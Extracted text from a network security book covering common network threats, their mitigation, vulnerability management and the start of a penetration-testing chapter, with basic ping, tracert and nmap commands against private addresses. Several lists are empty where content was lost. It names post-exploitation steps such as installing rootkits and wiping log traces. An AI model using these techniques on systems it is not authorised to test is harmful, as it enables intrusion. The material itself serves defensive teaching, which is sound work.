viruses attach themselves using a stealth technique and can easily affect the start
of a program, and users cannot easily detect an increase in the file codes.
Macro virus: The macro virus is another variant that targets software and
applications that have macros. They affect the performance of the software and
the program through a series of operations. These operations range from
tampering with data, redirection, and deleting data.
[ 90 ]
Mitigating the Top Network Threats of 2020 Chapter 3
[ 91 ]
Mitigating the Top Network Threats of 2020 Chapter 3
Traditionally, botnets were used for DDoS attacks but with time, they have been used for
crypto-mining, data extraction, email spam, click frauds, supporting C2C infrastructure,
and so on.
Botnets pose a very serious network security threat as they are engineered by
cybercriminals to infect as many devices as possible across the internet to attain their goal.
Such botnets are inclusive of PCs, servers, smartphones, IP cameras, and other IoT devices
that are connected over the internet and are controlled by the botmaster using a command
and control application. This enables them to execute and perform automated tasks without
the knowledge of the admin/user and remain undetected in the environment.
There are several different types of botnets and each of them is designed by a botmaster to
exploit system resources to commit cybercrime-related activities. Some notable types of
botnets and the threats to which they expose network systems are outlined here:
[ 92 ]
Mitigating the Top Network Threats of 2020 Chapter 3
Zeus: This is one of the most malicious botnets ever designed. It has the capacity
of affecting a wide range of operating systems such as Android, Windows
mobile, and Blackberry through processes that are socially engineered. Victims
receive fake URLs that automatically download security certificates to the bots.
This leads them to access bank details such as mobile transaction authentication
numbers and messages sent by banks to their customers and authenticate illegal
transactions.
Android.Bmaster: It is commonly referred to as a Million Dollar Mobile Botnet.
Trojan applications are activated by this botnet and millions of mobile
devices are affected. A lot of money, in terms of millions of dollars, is lost by
clients all over the world through premium messages forged by this botnet. It
controls SMS applications for vulnerable users and makes them work to the
botmaster's advantage.
Mirai botnet: The Mirai botnet took advantage of insecure IoT devices by
scanning for open Telnet ports over the entire internet in an attempt to log in
with the default device credentials, amassing a huge botnet army at the disposal
of the perpetrators. This was later used to launch huge DDoS attacks since
September 2016 against various organizations.
Smominru botnet: This botnet was attributed to hijacking more than half a
million systems over the globe, intended to mine cryptocurrency and exfiltrate
confidential data for selling on dark web forums. Most cryptojackers
(unauthorized use of a system for mining cryptocurrency) follow a rather simple
path of infiltrating a system by exploiting a known vulnerability or via brute-
forcing default credentials. It has been known to utilize an array of techniques
from using Mimikatz to EternalBlue exploits to propagate.
[ 93 ]
Mitigating the Top Network Threats of 2020 Chapter 3
Apart from that, we should also focus on limiting the capabilities of internet-connected
devices that have internet connectivity as an essential requirement. Here are a few other
steps that can be taken in this regard:
Sinkholes (internal and external) are another enterprise-level tactical approach that can be
used to mitigate multiple adversarial techniques and threats.
[ 94 ]
Mitigating the Top Network Threats of 2020 Chapter 3
Trojans are a type of malicious software that is programmed to take over the target device
to impact the confidentiality, integrity, and availability of the targeted system. To gain a
foothold in the environment, they imitate legitimate applications or software intending to
be initiated by a user post, which they start executing the embedded malicious code to
activate. They are often introduced in the environment via malicious emails as attachments
and download links or via the installation of untrusted third-party applications that have
already been bonded with the trojan.
There are different categories of trojans, depending on the specific mandates they are meant
to execute. Following is a comprehensive list of Trojans and the risks to which they expose
victims:
Just like the previous attack vectors, trojans can be mitigated too. Let's understand how.
[ 95 ]
Mitigating the Top Network Threats of 2020 Chapter 3
Detection of a rootkit is often difficult because they subvert security software and use
tactics to hide using clandestine methods. It often comes with capabilities such as password
stealers, keyloggers, and the ability to disable antivirus and other detection mechanisms
employed by traditional security software.
Memory rootkits: These rootkits are found in the system's RAM. A memory
rootkit comes accompanied by host software and hides its existence in a
computer and eliminates itself from the operating system. The rootkits can hide
in the computer memory for as long as years even without the knowledge of the
user.
User-mode rootkits: The existence of these rootkits in a computer is either
through injection by a dropper or it began during the system startup just like any
other program. They mainly infect the operating system of a computer and inject
malicious code into the system process. For Windows, the basic focus is the
manipulation of the basic functioning of Windows without the user's
knowledge.
Kernel rootkits: These are rootkits designed to alter the functioning of a
computer's operating system. They corrupt data by adding their own data
structures and code that change the system files completely. This greatly and
negatively impacts an operating system and slows down the computer's
performance. Their impact might not be instant but the system finally gets
destroyed.
[ 96 ]
Mitigating the Top Network Threats of 2020 Chapter 3
Bootloader rootkits: They infect the record of the master boot by building blocks
or bootkit targets on a computer. They impact the system by furnishing basic
commands and loading in the operating system as well as replacing the original
bootloader with the malicious one. A user finds it difficult to control this type of
rootkit because detecting and exterminating it is tricky. The injected code in the
MBR can only damage a computer if a user tries to remove it.
Hardware or firmware rootkits: Such rootkits are found installed on the
hardware or the firmware of the targeted system. They can impact the hard drive
and the system BIOS of the impacted device. Threat actors have been known to
use such rootkits for tampering with and the interception of data being written
on the disk.
[ 97 ]
Mitigating the Top Network Threats of 2020 Chapter 3
This threat ensures that, when links are sent, malware is installed on the computer system
without the knowledge of the user. The malware gets installed silently once the malicious
ad is clicked either on mobile devices or computers. This shows how user devices can be
targeted, which can lead to a loss of confidentiality and integrity and financial loss:
The main reason behind the deployment of malvertising is to give threat actors access to
vulnerable users and devices to introduce crypto-mining scripts, banking trojans and
ransomware, and compromises the target to extract financial gains. As a leading threat, it
becomes difficult to cope with because some malicious advertisements come from
reputable sources and familiar websites.
There have been reports in the recent past that point to malvertising exposing reputable
companies with attacks originating from the likes of Yahoo, The New York Times, BBC,
AOL, NFL, Spotify, and the London Stock Exchange, where they have been accused of
putting users at risk by displaying malicious advertisements.
[ 98 ]
Mitigating the Top Network Threats of 2020 Chapter 3
Ad verification services are very important because they act as watchdogs for the website.
They scan advertisement code to verify whether it comes from trusted sources or it is just
suspicious code. They are therefore recommended when dealing with malvertising.
Users can protect themselves with the utilization of browser-security plugins, disabling the
running of automatic Flash player scripts and scripts from websites, using a reputed ad-
blocker, and avoiding clicking on ads from suspicious websites.
Their victims are mostly companies that sell products and services online or social media
sites and services. Due to the ease and lack of sophistication needed to launch an effective
DDoS attack, this has become a favorite attack vector for threat actors resulting in the loss
of millions of dollars.
This attack, unlike other network threats, does not target stealing data or accessing sensitive
user information; the main objective is to crush the whole system down under the weight of
illegitimate requests.
The following diagram shows how this kind of attack is carried out:
DDoS impacts organizations by denying service to legitimate users and disrupting system
operations by a flood of connection requests that carry malformed packets. These packets
result in denial of services to legitimate users, slowing down of services, and the whole
system/service completely shutting down and crashing.
[ 99 ]
Mitigating the Top Network Threats of 2020 Chapter 3
DDoS attacks can be categorized based on the attack mechanism, and two of the most
prominent ones are discussed here:
Volume-based attacks: These are attacks where threat actors utilize the large
volume of requests to jam services using malformed packets and resulting in
flooding the network capability.
Application-based attacks: These are attacks where threat actors utilize known
application vulnerabilities to crash the system or service. These are typically
vulnerabilities that have high exposure to the availability factor in the CIA triad,
and require no user-interaction and/or have remote exploit readily available.
Such an application is internet facing and is the ripest target as it is easily
accessible over the internet.
Apart from the basic security hygiene practices of keeping OSes and applications updated
to prevent infection, organizations should also focus on the following:
[ 100 ]
Mitigating the Top Network Threats of 2020 Chapter 3
The stored information is encrypted/locked and kept out of access by the user; some
ransomware is also known to block usage of the system itself in an attempt to render the
device unusable. In such a case, the user is directed to contact the threat actor for the
decryption key to unlock the system and gain access to the data after paying a ransom
amount to the threat actor. In most cases, the money is paid through a virtual currency such
as Bitcoin to prevent revealing the identity of the threat actor.
Ransomware is mostly spread through infected software applications, scam and phishing
emails, malicious attachments, compromised websites with automated downloads or
malvertising, and external storage devices that are already infected.
Since this attack can result in a significant loss of data, victims often resort to paying the
ransom to the cybercriminals to unlock their systems. Threat actors often intimidate victims
by threatening deletion to convince the victim to pay up quickly.
[ 101 ]
Mitigating the Top Network Threats of 2020 Chapter 3
Since the dawn of WannaCry, which is well-known ransomware from 2017, organizations
of all sizes and segments have been hit by ransomware attacks in one way or another. It is
estimated that ransomware incidents cost an average of $2,500 to close to a million dollars.
With small and medium-sized organizations being at the biggest risk, the highest ransom
paid in 2018 was close to $900,000+. In 2019, the Baltimore city government was facing a
ransomware attack with an estimated cost of recovery stretching over $18 million,
impacting vaccine production, ATMs, airports, and hospitals among others.
One of the reasons for the wide prevalence of the ransomware attacks is the rise of the
ransomware-as-a-service model, which enables the threat actor to leverage pre-built off-the-
shelf ransomware tweaked to fit the scope of the attack with custom changes.
Encrypting ransomware: These are ransomware that encrypts files on the target
system and asks for crypto-currency for decrypting or releasing the files.
Non-encrypting ransomware: This ransomware does not encrypt files but
instead restricts access to the system by displaying pornographic images or
directs the user to send premium-rate SMSes or call premium-rate numbers to
receive codes to unlock the system.
Doxware: These are attacks where the attacker threatens to publish private
information about the victim over the internet. In such attacks, malware is
employed to exfiltrate screenshots, webcam recordings, and other private
information to humiliate the victim into paying the said ransom.
Mobile ransomware: These are ransomware targeting mobile platforms using a
payload to block access to the device using administrative privileges gained
during the installation of rogue apps. Such ransomware is also known to lock
access to devices and exploit access to cloud backup accounts.
Over the years, attackers have been constantly innovating tactics and techniques to make
ransomware infections more potent. Some of them include the following:
Utilizing fake Adobe Flash updates from the compromised website (Bad Rabbit
and TeslaCrypt)
Phishing campaigns imitating cloud-based Office 365 updates (Cerber)
Malware-laced macro in Office files (GoldenEye)
Generic phishing campaigns (LockerGoga and Locky)
Utilizing wipers to destroy data instead of obtaining a ransom (NotPetya)
Overwriting the MBR—Master Boot Record (Petya and GoldenEye)
Utilizing worm-like behavior (WannaCry and ZCryptor).
[ 102 ]
Mitigating the Top Network Threats of 2020 Chapter 3
[ 103 ]
Mitigating the Top Network Threats of 2020 Chapter 3
So far in this section, we've seen 10 of the most feared attack vectors that you need to
protect your network from. However, besides these, there are a few others that are
important to be aware of. Let's take a look at them.
[ 104 ]
Mitigating the Top Network Threats of 2020 Chapter 3
Notable mentions
The overall idea needs to be to have a security-by-design framework and implement it
across the environment, which takes care of all the prevalent threats as well as the threats
that your industry and organization specifically face.
Besides the aforementioned attacks, there are a few others that need your attention.
Drive-by download
These are downloads that are initiated automatically in the background without the
knowledge of the user. Often, malware, viruses, and spyware employ such tactics to
download the malicious application on the target system when the user is visiting a
website, opening an email attachment, or closing pop-up ads.
A user might visit a malicious website while running a vulnerable version of Flash that
might get exploited (or exploit a browser or plugin, hidden IFrames and JavaScript,
malvertisements, and cross-site scripting, among other techniques) to initiate the silent
download of ransomware or a trojan.
In recent times, AI-powered malware such as DeepLocker has come to light, where
researchers found hidden malicious code that can be executed once pre-defined conditions
are met. IBM researchers demonstrated this at BH 2018 where a legitimate webcam
application with the malicious code was used to deploy ransomware once the user looked
at the laptop webcam.
[ 105 ]
Mitigating the Top Network Threats of 2020 Chapter 3
Smart phishing is another example where attackers use AI and ML to form phishing emails
using PII information already collected by scrapping through various sources to make it
look more legitimate and relevant. Overall, we have seen advancements in the AI-driven
use cases by threat actors to do the following:
In 2019, companies such as Cable One, Westpac Bank, the Bank of Queensland, U.S.
Customs and Border Protection, Instagram, Truecaller, major Indian banks (Axis, ICICI,
IndusInd, RBL), Forbes, Freedom Mobile, Facebook, and several educational
institutions were impacted by data breaches due to third-party and supply chain attacks.
Organizations can take the following steps to ensure the protection of their network from
supply chain attacks:
The Third-Party Cyber Risk for Financial Services report states that
nearly 97% of respondents said that cyber risk affecting third parties is
a major issue. - Help Net Security (reference:
https://www.helpnetsecurity.com/2019/04/03/third-party-cyber-
risk-management-approaches/)
Besides being alert to these threat actors that we just discussed and taking appropriate steps
to mitigate them, organizations must also focus on creating an integrated defense
architecture. Let's discuss this more next.
[ 106 ]
Mitigating the Top Network Threats of 2020 Chapter 3
A central monitoring and response capability: Such a capability will take care
of centralized policy management, provisioning, configuration management,
change management, and event management, resulting in smooth security
operations and extensive visibility. This can be achieved by deploying a SIEM
platform such as Splunk, ArcSight, QRadar, ELK, and AlienVault OSSIM.
Security engineering: This is responsible for extension, streamlining, process
enhancement, and fine-tuning security operations and ensuring accurate and
adequate enforcement of those controls along with measuring their effectiveness
and efficiency.
Threat intelligence and threat hunting: These are responsible for being the eyes
and ears of security operations, maintaining situational awareness level for
emerging and prevalent threats. Threat hunting teams can leverage these inputs
and do proactive threat hunts in the network environment to detect, identify, and
mitigate covert threats that have successfully bypassed security mitigations and
controls. More on this is discussed in Chapter 9, Proactive Security Strategy.
Now that we have understood the typical threats that are faced by organizations and their
relevant mitigation strategies, it's time to focus on strategies that can assist us in keeping
track of new vulnerabilities and assessing the network for threats with the help of
continuous monitoring.
[ 107 ]
Mitigating the Top Network Threats of 2020 Chapter 3
Researchers explain that there are a lot of inherent loopholes that lead to network
vulnerabilities. These gaps expose the infrastructure to a hacker to readily commit
cybercrime. For example, missing data encryption is an opening that makes a network
vulnerable and needs to be fixed. Some organizations have inadequate password policies;
these passwords are simple and easy to guess and an intruder will not struggle to break
into the database by cracking them if a change is not enforced after a while. Critical assets
may have missing authentications or authorization checks, which might be a welcome sight
for an attacker to easily infiltrate those assets that may process or be very critical to
organizational operations.
Some prominent defense mechanisms against such vulnerabilities are discussed next.
[ 108 ]
Mitigating the Top Network Threats of 2020 Chapter 3
It's also important to have cyclic security audits in place to maintain assurance into the
engagement and identification of any loopholes or blindspots that might result in a
potential cyber disruption or cyber threats for said organization.
Enabling security best practices such as SPF, DKIM, and DMARC and the use of
2FA
Implementing spam filters, email sandboxing for attachments, hyperlink
sanitization, and email encryption
Training employees, including executive leadership, on safe security practices
and conducting phishing simulations
[ 109 ]
Mitigating the Top Network Threats of 2020 Chapter 3
Pretty much every organization depends on emails for their business operations and
exchange of information. Hence, it is obviously one of the most widely used attack vector
by threat actors to infiltrate an organization and make headway into a target environment
via means of phishing and malware-laced emails.
Let's conclude this section by understanding how vulnerabilities can be kept at bay by
adopting a few steps as part of the vulnerability management life cycle.
1. Discover: This step focuses on the discovery of all assets within a network and
host details such as open services, ports, and operating systems that should be
thoroughly examined to detect exiting vulnerabilities, along with a network
baseline. An automated schedule should be in place to identify and detect
security vulnerabilities regularly.
2. Prioritize assets: All assets within the business should be categorized according
to their order of value and function (crown jewels and high-value targets should
be prioritized). Business criticality, units, and groups should be the basis of
classification so that business value can be asserted to every asset group
according to their complexity within the business operation.
[ 110 ]
Mitigating the Top Network Threats of 2020 Chapter 3
Next, we will take a look at important attributes around network vulnerability assessments
and how we can utilize a scanning tool to analyze a network.
Analysis and reviews within the network are done vigorously to detect loopholes and
possible security vulnerabilities. The security architecture and the defense mechanism of a
network are hence improved by network administrators and security professionals to curb
possible threats and vulnerabilities. It is mostly done through special inspections that can
detect potential weak points and security holes capable of exploiting a computer network,
which can be based on the NIST Cyber Security Framework or other security best practices
and industry guidelines for a comprehensive assessment. These inspections can identify
and classify vulnerabilities in the environment following which we can go to confirm the
appropriateness of countermeasures, effectiveness.
[ 111 ]
Mitigating the Top Network Threats of 2020 Chapter 3
Some of the broad topics that should be focused on during network assessment apart from
vulnerabilities are the following:
Inventory management
Device and server management (including mobile devices)
The appropriate configuration of networking devices
Identifying and accessing management
User behavior analysis
There are various steps followed in the assessment of vulnerabilities. The initial one
identifies the assets within a network and defines the threats and value of each critical
assets and devices. This is concerning the input of the client, for instance, vulnerability
scanners and security assessment. The definition of a system baseline is also key. It
identifies the extent of an exposed threat and the limit of detection for such risks.
Vulnerability scans are also performed to determine the level of a vulnerability risk within
a network. Finally, a report is created once the vulnerability assessment is done.
Besides these methods, there are also automated platforms that assist us in the process and
speed up of assessments. Let's look at a few of these platforms.
Typically, a good vulnerability assessment platform should check for all major threat
vectors inclusive of the prevalent and recent ones that are being used by attackers to target
organizations. Some of these may include directory listing, PII disclosure, code injection,
XXE, SSRF, CSRF, XSS, SQL injection, captcha detection, RFI and LFI, path traversal, source
code disclosure, command injection, session fixation, response splitting, insecure cookies,
session hijacking, and other OWASP-defined attack vectors.
[ 112 ]
Mitigating the Top Network Threats of 2020 Chapter 3
Nexpose: This tool provides better insights into reported vulnerabilities with an
advanced prioritization score and provides continuous monitoring of new assets
and devices added to the network. Besides this, it helps in policy assessment with
regards to industry standards such as NIST and CIS and provides prioritized
remediation reports with ready to use Metasploit integration.
Nessus professional: Nessus provides real-time vulnerability updates;
compliance checks against major standards such as NIST, PCI, CIS, and FDCC;
and operational capabilities such as coverage across CVEs and scanning time,
and accuracy and the UI are major differentiators.
OpenVAS: This is a free and open source feature-rich software vulnerability
scanner that provides you with all of the major features of a commercial scanning
platform. It includes authenticated and unauthenticated scans and scanning of
high and low-level industrial protocols, among other features.
The organization should not completely depend on automated vulnerability scanning tools
alone but should also focus on building the capability and training the analyst to conduct
manual testing and tweak the logic of the scans to make a more insightful and
contextualized scan based on the environment and network landscape as well as the
business logic of the processes.
Transactional applications and other financial controls are specifically audited continuously
to prevent any malicious activity that may severely impact the business of an organization
by causing financial and reputational damage along with regulatory fines, if not detected
and acted upon in appropriate timelines.
[ 113 ]
Mitigating the Top Network Threats of 2020 Chapter 3
With respect to securing networks, continuous monitoring plays a very vital role by
identifying all potential threats in the environment on a real-time basis. In terms of
operation, they yield effective and relevant results as it helps to deal with probable
potential threats and works strategically while updating real-time threat information,
creating awareness of existing vulnerabilities and maintaining visibility through the
network. In the case of existing monitoring data that is available, it becomes important to
collect additional data points that can either provide context or clarity around the potential
threats.
A lot of consulting organizations service solutions and promote the idea of the cyber
defense platform, which is a good example of how to operationalize different vendor
products and solutions to work synchronously as an integrated solution forming a
formidable security posture for the organization. An example of this is the Accenture Cyber
Defense Platform, published in 2016, which compromises solutions from vendors such as
Splunk (SIEM with security analytics and ML for environment monitoring), Palo Alto, and
Tanium (perimeter and endpoints security mitigations). Similarly, organizations such as
Wipro and Symantec also have integrated threat management offerings, which are a good
industrialized model to implement.
In an organization, risks and threats are addressed by placing mitigating controls in place.
These controls and operations should continuously be monitored for their effectiveness in
mitigating threats and abnormal activity or unauthorized changes in the environment that
need to be reviewed and validated.
This way, the company's operational risk profile is enhanced. There are potential benefits
associated with continuous monitoring as the mitigation techniques applied are unique.
They focus on identifying loopholes and problems as soon as they occur. Corrective actions
are carried out immediately after the detection and this helps to safeguard networks from
potential threats.
[ 114 ]
Mitigating the Top Network Threats of 2020 Chapter 3
Prepare: This focuses on the mission of the organization along with the business
processes to effectively manage the security and privacy risk level.
Categorize: This classifies information based on impact analysis.
Select: This sets the baseline security controls based on the security
categorization as deemed necessary due to the risk levels.
Implement: This deals with the implementation of the security controls and
documents how they are operationalized.
Assess: This talks about the effectiveness and efficiency of the applied security
controls.
Authorized: This provides the required authorization of the system processes
based on the determination of organizational risk to assets, employees, and
processes resulting from the system operations.
Monitor: This focuses on monitoring the security controls on an ongoing basis to
assess the security control performance, conduct an impact analysis of changes,
and report on the same to the management.
[ 115 ]
Mitigating the Top Network Threats of 2020 Chapter 3
Some of the top platforms used for continuous monitoring are as follows:
Next, we will take a look at NIST 800-37 and understand the key aspects and attributes of it
the same that can be implemented by organizations.
In 2018, NIST published an update on SP800-37 (Rev 2) titled Risk Management Framework
for Information Systems and Organizations: A System Life Cycle Approach for Security and
Privacy, which consisted of seven major objectives:
[ 116 ]
Mitigating the Top Network Threats of 2020 Chapter 3
In the framework, the integration of risk management in the aforementioned disciplines are
at the core mission of the levels of the organizational processes. Practitioners of
cybersecurity, IT auditors, the general IT field, and governance professionals become very
important as they can understand and contemplate how the recent release of NIST can be
impactful to their organizations and companies. The publication of NIST and its release has
greatly helped in risk management. Some of the major fundamental focus points include
the organization-wide risk management process, utilization of a system development life
cycle, enforcement of logical and technical system boundaries, and security control
implementation.
Summary
In this chapter, we looked at the various prevalent network threats and their concurrent
impact on organizations from a day-to-day operational standpoint. We also discussed how
security professionals can work toward mitigating each of them and subsequently forming
an integrated fortified cyber defense posture for the environment.
Equipped with the information from this chapter, you should now be able to create a
comprehensive plan of which threats you need to check for and how to mitigate each of
them, as well as how to create a vulnerability management plan and assess the network's
secure state and compliance level.
Following this train of thought, in the next chapter, we will take a look at how to conduct
network penetration testing and the various industry best practices. We will take a step-by-
step approach for practical penetration testing and enable you to perform network
penetration testing and document the findings on your own. We will look at the different
tools and platforms that will help us to perform these activities efficiently.
[ 117 ]
Mitigating the Top Network Threats of 2020 Chapter 3
Questions
As we conclude, here is a list of questions for you to test your knowledge regarding this
chapter's material. You will find the answers in the Assessments section of the Appendix:
[ 118 ]
Mitigating the Top Network Threats of 2020 Chapter 3
Further reading
Breaking Down the Anatomy of a Phishing Attack: https://logrhythm.com/
blog/breaking-down-the-anatomy-of-a-phishing-attack/
Detecting a Phishing Attack with Phishing Intelligence Engine (PIE): https://
gallery.logrhythm.com/use-cases/detecting-a-phishing-attack-use-case.
pdf
Emerging Insider Threat Detection Solutions: https://blogs.gartner.com/
avivah-litan/2018/04/05/insider-threat-detection-replaces-dying-dlp/
20 Common Types of Viruses Affecting Your Computer: https://www.
voipshield.com/20-common-types-of-viruses-affecting-your-computer/
New Adwind Malware Campaign Targets Utilities Industry Via Phishing
Techniques: https://latesthackingnews.com/2019/08/25/new-adwind-
malware-campaign-targets-utilities-industry-via-phishing-tehcniques/
The Mirai botnet explained: https://www.csoonline.com/article/3258748/
the-mirai-botnet-explained-how-teen-scammers-and-cctv-cameras-almost-
brought-down-the-internet.html
Smominru Monero mining botnet making millions for operators: https://www.
proofpoint.com/us/threat-insight/post/smominru-monero-mining-botnet-
making-millions-operators
Major sites including the New York Times and BBC hit by "ransomware"
malvertising: https://www.theguardian.com/technology/2016/mar/16/major-
sites-new-york-times-bbc-ransomware-malvertising
Cloudflare DDoS Mitigation: https://www.cloudflare.com/learning/ddos/
ddos-mitigation/
[ 119 ]
Mitigating the Top Network Threats of 2020 Chapter 3
[ 120 ]
2
Section 2: Network Security
Testing and Auditing
In this section, you will find information pertaining to the technical aspects of protecting a
network. We are going to deal with the key aspects, such as how to perform a network
penetration testing exercise, how to conduct network forensic engagements, and how to
perform network security audits. We will also touch upon various advanced network
attacks and how you can protect your organization and network from them.
In this chapter, we will take a deep dive into the practical aspects of conducting a
penetration testing exercise and look at some of the tools that will come in handy for this.
We will also take a look at the typical team compositions and engagement models.
Technical requirements
To get the most out of this chapter, you should familiarize yourself with the following
platforms before you begin:
Kali Linux
The Metasploit framework
The pfSense firewall
OpenVas
Network Penetration Testing and Best Practices Chapter 4
Sparta
Nikto
Nmap
Armitage
DIRB
Damn Vulnerable Web App (DVWA)
Burp Suite
[ 123 ]
Network Penetration Testing and Best Practices Chapter 4
The goal of a penetration test is to understand the weaknesses in the infrastructure and the
environment of an organization. It helps in planning the corrective and preventive
measures that can be taken according to the observations that have been made.
The approach to pen testing is a defined set of steps/phases that should be followed for a
structured pen testing exercise. These steps are shown in the following diagram:
The official Kali Linux OS also arranges all their pen testing tools in the order shown here.
Let's very briefly look at these steps.
Pre-engagement
This involves defining test goals and determining whether it's going to be a very detailed
pen testing exercise or not. It involves analyzing source code and understanding the
different teams that will be involved in the exercise, as well as their scope. This step will
also explain whether it will be a black-box, white-box, or gray-box test. Aspects such
as scope, time, and exclusions should be taken into account.
[ 124 ]
Network Penetration Testing and Best Practices Chapter 4
Reconnaissance
This is the process of information gathering and discovering different services, nodes, and
layers in a given network. The following methods may be used for information gathering:
Reconnaissance is important to get the initial layout of the target network and strategize the
tactics and techniques that will be used subsequently in the later stages.
Threat modeling
This step will involve identifying any threat that appears and breaking that threat into
smaller parts and identifying the risks associated with it. This phase will tell the pen tester
the fields that a particular threat will target. This phase is very important in the case of
"scenario-based penetration testing" as this helps in creating relevant scenarios. Threat
modeling tells the penetration tester which targets/systems/assets could be used as an entry
point or be focused on in the engagement.
Exploitation
This is the process of practically breaching the system by using certain exploits and
techniques. The following attacks may be carried out to exploit the network:
This step is at the core of the entire testing strategy, which is where the actual attack takes
place.
[ 125 ]
Network Penetration Testing and Best Practices Chapter 4
Post-exploitation
Post-exploitation depends on the perpetrator, such as in the case of penetration testers.
They will try to escalate the privileges, pivot, conduct data exfiltration, domain policies,
and more. An actual threat actor would try to compromise the network, steal sensitive
file information, install rootkits and permanent access scripts, and even deface the services.
Installing rootkits
Privilege escalation attacks
Pivoting
Internal network mapping
Accessing the log files and wiping traces
Changing configurations
After the pen test exercise has been completed, the following may be done in the post-
exploitation phase:
This step may also include wiping your traces from the logs of the system that you have
created due to your presence inside the network.
Reporting
A very important process involves reporting your findings and the methodologies that
were used for the aforementioned steps. The report has to be very concise and must explain
all the steps with clarity. A standard should be followed while making a pen test report.
Generally, the pattern differs from organization to organization, as well as the type and
scope of the testing engagement. Ideally, it should cover the following:
An executive summary
The scope and technical approach
Test results with a risk-based score and specified severity
[ 126 ]
Network Penetration Testing and Best Practices Chapter 4
Retesting
Retesting is the process of testing the parameters again after making improvements,
removing misconfigurations, and applying patches to any loophole due to which the
system was exploited.
There may be a defined benchmark against which a network has to be pen tested. The
benchmark would depend on the type and number of services running in that particular
network. Also, the architecture of any network is important. For example, a network that is
being protected by a network firewall will be tested with a method that's different from the
one being used on a network that is being protected by a deep packet inspection firewall.
The following are the general benchmarks that have to be kept in mind while pen testing
any given network:
Pen testing network boundary entities: This involves testing entities such as
routers, firewalls, IPS/IDS, switches, and NAT routers
Pen testing Machine OSes: Operating systems that are in use must be tested.
This may include testing your Windows active directory, domain controllers,
hash, pen testing mobile app backends, attacking the DMZ and pivoting into the
internal network, privilege escalation on vulnerable kernels, checking web
application vulnerabilities, and so on.
Shells from different services: Shells from different services such as SQL and
PHP must be checked.
Antivirus evasion testing: It is important to test if your systems are evading
antivirus. This can be done by shell coding the malicious scripts, testing rootkits,
and testing backdoors.
Social engineering attacks: Java Applet and remote JavaScript execution can be
carried out.
[ 127 ]
Network Penetration Testing and Best Practices Chapter 4
Besides these points, we can also apply scenario-based pen testing, source code analysis,
and many other techniques while pen testing a network. The preceding are only the general
points that are tested while a detailed pen testing exercise is attempted on your network.
But where do we start? The following should be the sequence of your pen testing exercise:
1. Test the frequently used services first; for example, DMZ servers, HTTP servers,
or any other service being exposed to the external network.
2. Next, our top priority is to test any service protected by authentication. To do
this, we can employ brute-force attacks, password hash cracking attacks,
password authentication bypass attacks, database attacks, and so on.
3. Next, test the network boundaries.
4. Finally, test the internal network.
With this, we have come to the end of our first section, where we discussed the various
stages of a penetration testing engagement that you will need to follow. However, there are
a number of pen testing tools out there to help us with this. Let's discuss a few of them.
In this section, we will carry out a practical pen testing exercise, where we will use a
combination of tools. We will divide this into two main parts. In the first part, we will
use automated network scanning tools, and then we will pen test the system manually by
using different independent scripts. But first, let's understand the network that we have to
pen test.
[ 128 ]
Network Penetration Testing and Best Practices Chapter 4
[ 129 ]
Network Penetration Testing and Best Practices Chapter 4
With the preceding setup in place, we can start looking at how the platforms can be used
for this exercise. As I mentioned earlier, we will be dividing our exercise into two parts –
automated exploitation and manual exploitation. So, let's begin.
The following are some of the automated tools that are commonly used for penetration
testing.
OpenVas
Open Vulnerability Assessment System (OpenVas) is a vulnerability scanning framework
that can be utilized for vulnerability scanning and vulnerability management. It consists of
free services and scripts, along with enterprise support for a professional setup that can be
used by an organization. It is intended to be a one-stop-shop for all vulnerability scanning
requirements.
After installing OpenVas on Kali, we start the scan. It has a GUI that makes the scanning
process quite easy. Let's scan our network using OpenVas:
[ 130 ]
Network Penetration Testing and Best Practices Chapter 4
OpenVas correctly listed a lot of vulnerabilities that existed in the web server. OpenVas can
also separate the false positives from the vulnerabilities in the generated report.
Sparta
Sparta is a Python GUI application that simplifies the network and web app penetration
and enumeration processes. It saves the pen tester's time by providing all the enumeration
tools upfront. Sparta comes readily available in Kali Linux.
The Sparta scan revealed two services running on port 80 and port 3632.
[ 131 ]
Network Penetration Testing and Best Practices Chapter 4
The following are the available scanning scripts that can be launched on discovered
services using Sparta:
Take screenshot
Run WhatWeb
Run Nmap (scripts) on port
Run Nikto
Launch webslayer
Portscan
[ 132 ]
Network Penetration Testing and Best Practices Chapter 4
Mark as checked
Open with telnet
Open with SSH client (as root)
Open with Netcat
Send to Brute
Open in browser
Launch dirbuster
Grab banner
You can get the latest version of Sparta from Github at https://github.
com/SECFORCE/sparta.
A detailed walkthrough of this process, along with technical
requirements, can be found at https://sparta.secforce.com/.
Armitage
The third automated tool is Armitage. Armitage is a graphical (scriptable) cyber attack
management platform for the Metasploit Project that aids the penetration tester by
visualizing targets and recommending relevant exploits for them. It is also used as a red
team collaboration team tool where teams can share investigation details and run
automation tasks. It's a GUI-based, Java-based tool for making tasks easier for pen testers.
[ 133 ]
Network Penetration Testing and Best Practices Chapter 4
Any exploited target that is under attack will look like this:
[ 134 ]
Network Penetration Testing and Best Practices Chapter 4
The following is a brief comparison of the three automated tools that we've just seen:
Although automated tools save us a good amount of time and effort, they can't ever be as
successful as a pen tester's mind. Most of the time, these tools are expensive and
outdated. Secondly, they use a defined benchmark to check for flaws in a given network
environment. The best practice is to be able to exploit the vulnerabilities yourself manually
and check for them one by one. A Bash environment can be automated using Python
scripting to complete the required task.
[ 135 ]
Network Penetration Testing and Best Practices Chapter 4
We will now look at some of the widely used manual penetration testing tools in the
industry, as well as how to use them in combination to carry out a manual pen testing
exercise.
Kali Linux
Kali is an operating system by default. It contains more than 300 penetration testing tools
for ethical hackers. Almost everything a person may require during the exploitation phase
is provided in this distribution of Linux. So, it's desirable, as well as recommended, that the
pen tester uses Kali for exploitation.
Nmap
Here is where we'll begin our pen testing exercise. So, let's see how it all works out. It's time
you play the role of an attacker and carry out a pen test on the network we discussed
earlier.
The very first step of exploitation is information gathering. So, as a thumb rule, the less
information a machine/network exposes to external entities, the more secure it is, and vice
versa. So, as an attacker, you will want to attack the internal network. At the moment, you
can only ping the firewall, which has a public IP and is visible on the internet. Start with
mapping the network. The following are the different commands you can try:
1. Start with the Ping and Tracert commands to get some general know-how of
the target and its state (these are used alternatively):
Ping 172.23.24.1, ping 172.23.24.1
Tracert 192.168.43.93, tracert 172.23.24.1
[ 136 ]
Network Penetration Testing and Best Practices Chapter 4
2. The very first tool that you will look into is Nmap. It's used for finding open
ports, enumerating services running on the targets, and even launching some
attacks, such as brute-force attacks, using its built-in scripting engine (NSE):
Nmap --help
The preceding command will output details of the Nmap on the Terminal.
3. Next, search for open ports and try to gather information about them with the
following commands:
The following command will only search for the 1,000 most commonly
used ports:
Nmap 172.23.24.1
